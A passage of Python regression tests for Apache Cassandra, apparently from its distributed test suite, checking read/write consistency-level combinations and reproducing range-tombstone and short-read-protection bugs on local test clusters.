(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_simple_strategy(combinations)
@since("3.0")
def test_simple_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, using simple replication strategy, only
the each quorum reads.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_simple_strategy(combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy(self):
"""
Test for multiple datacenters, using network topology replication strategy.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_network_topology_strategy(combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, using network topology strategy, only
the each quorum reads.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_network_topology_strategy(combinations)
class TestAccuracy(TestHelper):
"""
Test that we can consistently read back what we wrote depending on the write and read consistency levels.
"""
class Validation:
def __init__(self, outer, sessions, nodes, rf_factors, start, end, write_cl, read_cl, serial_cl=None):
self.outer = outer
self.sessions = sessions
self.nodes = nodes
self.rf_factors = rf_factors
self.start = start
self.end = end
self.write_cl = write_cl
self.read_cl = read_cl
self.serial_cl = serial_cl
logger.debug('Testing accuracy with WRITE/READ/SERIAL consistency set to {}/{}/{} (keys : {} to {})'
.format(consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl), start, end - 1))
def get_expected_consistency(self, idx):
return self.outer.get_expected_consistency(idx, self.rf_factors, self.write_cl, self.read_cl)
def validate_users(self):
"""
First validation function: update the users table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
num = 0
for s in sessions:
if outer.query_user(s, n, val, read_cl, check_ret=expected_consistency.is_strong):
num += 1
assert num >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes," + \
" required {} but got {} - [{}, {}]".format(expected_consistency.num_write_nodes, num, n, val)
for n in range(start, end):
age = 30
for s in range(0, len(sessions)):
outer.insert_user(sessions[s], n, age, write_cl, serial_cl)
check_all_sessions(s, n, age)
if serial_cl is None:
age += 1
for s in range(0, len(sessions)):
outer.update_user(sessions[s], n, age, write_cl, serial_cl, age - 1)
check_all_sessions(s, n, age)
age += 1
outer.delete_user(sessions[0], n, write_cl)
check_all_sessions(s, n, None)
def validate_counters(self):
"""
Second validation function: update the counters table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
results = []
for s in sessions:
results.append(outer.query_counter(s, n, val, read_cl, check_ret=expected_consistency.is_strong))
                assert results.count(val) >= expected_consistency.num_write_nodes, \
                    "Failed to read value from sufficient number of nodes, required {} nodes to have a" \
                    " counter value of {} at key {}, instead got these values: {}".format(
                        expected_consistency.num_write_nodes, val, n, results)
for n in range(start, end):
c = 1
for s in range(0, len(sessions)):
outer.update_counter(sessions[s], n, write_cl, serial_cl)
check_all_sessions(s, n, c)
# Update the counter again at CL ALL to make sure all nodes are on the same page
# since a counter update requires a read
outer.update_counter(sessions[s], n, ConsistencyLevel.ALL)
c += 2 # the counter was updated twice
def _run_test_function_in_parallel(self, valid_fcn, nodes, rf_factors, combinations):
"""
Run a test function in parallel.
"""
requires_local_reads = False
for combination in combinations:
for i, _ in enumerate(nodes):
expected_consistency = self.get_expected_consistency(i, rf_factors, combination[0], combination[1])
if not expected_consistency.is_strong:
# if at least one combination does not reach strong consistency, in order to validate weak
# consistency we require local reads, see CASSANDRA-12092 for details.
requires_local_reads = True
break
if requires_local_reads:
break
self._start_cluster(save_sessions=True, requires_local_reads=requires_local_reads)
input_queue = queue.Queue()
exceptions_queue = queue.Queue()
def run():
while not input_queue.empty():
try:
v = TestAccuracy.Validation(self, self.sessions, nodes, rf_factors, *input_queue.get(block=False))
valid_fcn(v)
except queue.Empty:
pass
except Exception:
exceptions_queue.put(sys.exc_info())
start = 0
num_keys = 50
for combination in combinations:
input_queue.put((start, start + num_keys) + combination)
start += num_keys
threads = []
for n in range(0, 8):
t = threading.Thread(target=run)
            t.daemon = True
t.start()
threads.append(t)
logger.debug("Waiting for workers to complete")
while exceptions_queue.empty():
time.sleep(0.1)
            if len([t for t in threads if t.is_alive()]) == 0:
break
if not exceptions_queue.empty():
_, exceptions, tracebacks = list(zip(*exceptions_queue.queue))
raise MultiError(exceptions=exceptions, tracebacks=tracebacks)
@pytest.mark.resource_intensive
def test_simple_strategy_users(self):
"""
        Test for a single datacenter, users table.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
]
logger.debug("Testing single dc, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_simple_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, users table, only the each quorum reads.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_users(self):
"""
Test for multiple datacenters, users table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
logger.debug("Testing multiple dcs, users")
        self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
        Test for multiple datacenters, users table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations)
def test_simple_strategy_counters(self):
"""
Test for a single datacenter, counters table.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
]
logger.debug("Testing single dc, counters")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@since("3.0")
def test_simple_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, counters table, only the each quorum
reads.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_counters(self):
"""
Test for multiple datacenters, counters table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
]
logger.debug("Testing multiple dcs, counters")
        self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, counters table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, counters, each quorum reads")
        self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations)
class TestConsistency(Tester):
@since('3.0')
def test_14513_transient(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
transient data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the bug can cause queries to return invalid
results by just a single node.
"""
cluster = self.cluster
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1})
cluster.populate(1).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 1};"
session.execute(query)
        query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));'
session.execute(query)
# populate the table
        stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);')
        # set the CL on the statement itself: execute()'s third positional argument is a timeout, not a consistency level
        stmt.consistency_level = ConsistencyLevel.ONE
        for year in range(2011, 2018):
            for month in range(1, 13):
                for day in range(1, 31):
                    session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'])
node1.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
batch = BatchStatement(batch_type=BatchType.UNLOGGED)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
session.execute(batch)
node1.flush()
# the data should still be there for years 2011-2017, but prior to CASSANDRA-14513 it would've been gone
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
@since('3.0')
def test_14513_permanent(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
permanent data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the invalid RT can propagate to other replicas
and delete data permanently.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1, 'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 3};"
session.execute(query)
        query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));'
session.execute(query)
# populate the table
        stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);')
        # set the CL on the statement itself: execute()'s third positional argument is a timeout, not a consistency level
        stmt.consistency_level = ConsistencyLevel.QUORUM
        for year in range(2011, 2018):
            for month in range(1, 13):
                for day in range(1, 31):
                    session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'])
cluster.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
# take one node down
node3.stop(wait_other_notice=True)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
        batch = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=ConsistencyLevel.QUORUM)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
        session.execute(batch)
node1.flush()
node2.flush()
# take node2 down, get node3 up
node2.stop(wait_other_notice=True)
node3.start()
# insert an RT somewhere so that we would have a closing marker and RR makes its mutations
stmt = SimpleStatement("DELETE FROM journals.logs WHERE user = 'beobal' AND year = 2010 AND month = 12 AND day = 30",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
# this read will trigger read repair with the invalid RT and propagate the wide broken RT,
# permanently killing the partition
stmt = SimpleStatement("SELECT * FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
        # prior to the CASSANDRA-14513 fix everything would be gone; with the fix the data should all still be there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal';",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
@since('3.0')
def test_14330(self):
"""
@jira_ticket CASSANDRA-14330
A regression test to prove that we no longer trigger
AssertionError during read repair in DataResolver
when encountering a repeat open RT bound from short
read protection responses.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node2)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with all nodes up, insert an RT and 2 rows on every node
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] 0 1
session.execute('DELETE FROM test.test USING TIMESTAMP 0 WHERE pk = 0 AND ck >= 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 1;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 1;')
# with node1 down, delete row 0 on node2
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] x 1
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test USING TIMESTAMP 1 WHERE pk = 0 AND ck = 0;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, make a LIMIT 1 read that would trigger a short read protection
# request, which in turn will trigger the AssertionError in DataResolver (prior to
# CASSANDRA-14330 fix)
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 1;',
[[1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13911(self):
"""
@jira_ticket CASSANDRA-13911
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down, insert row 0 on node1
#
# node1, partition 0 | 0
# node2, partition 0 |
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0);')
node2.start(wait_for_binary_proto=True)
# with node1 down, delete row 1 and 2 on node2
#
# node1, partition 0 | 0
# node2, partition 0 | x x
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2);')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13911 this would trigger an IllegalStateException
assert_all(session,
'SELECT DISTINCT pk FROM test.test;',
[[0]],
cl=ConsistencyLevel.ALL)
@since('3.11')
@ported_to_in_jvm('4.0')
def test_13911_rows_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can no longer rely on
!singleResultCounter.isDoneForPartition() to abort single
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | 0 x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 1;')
node2.start(wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | x 1 2 -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 2) USING TIMESTAMP 42;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 3;
# without the change to if (!singleResultCounter.isDoneForPartition()) branch,
# the query would skip SRP on node2, partition 2, and incorrectly return just
# [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 3;',
[[0, 0], [0, 1],
[2, 2]],
cl=ConsistencyLevel.ALL)
@since('3.11')
@ported_to_in_jvm('4.0')
def test_13911_partitions_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can't rely on
!singleResultCounter.isDone() to abort ranged
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | x x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck IN (0, 1);')
node2.start(wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | 0 1 - -
# node2, partition 4 | 0 1 - -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 1) USING TIMESTAMP 42;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 4;
# without the extra condition in if (!singleResultCounter.isDone()) branch,
# the query would skip partitions SRP on node2 at the end of partition 2,
# and incorrectly return just [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 4;',
[[0, 0], [0, 1],
[4, 0], [4, 1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13880(self):
"""
@jira_ticket CASSANDRA-13880
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
stmt = SimpleStatement("INSERT INTO test.test (id) VALUES (0);",
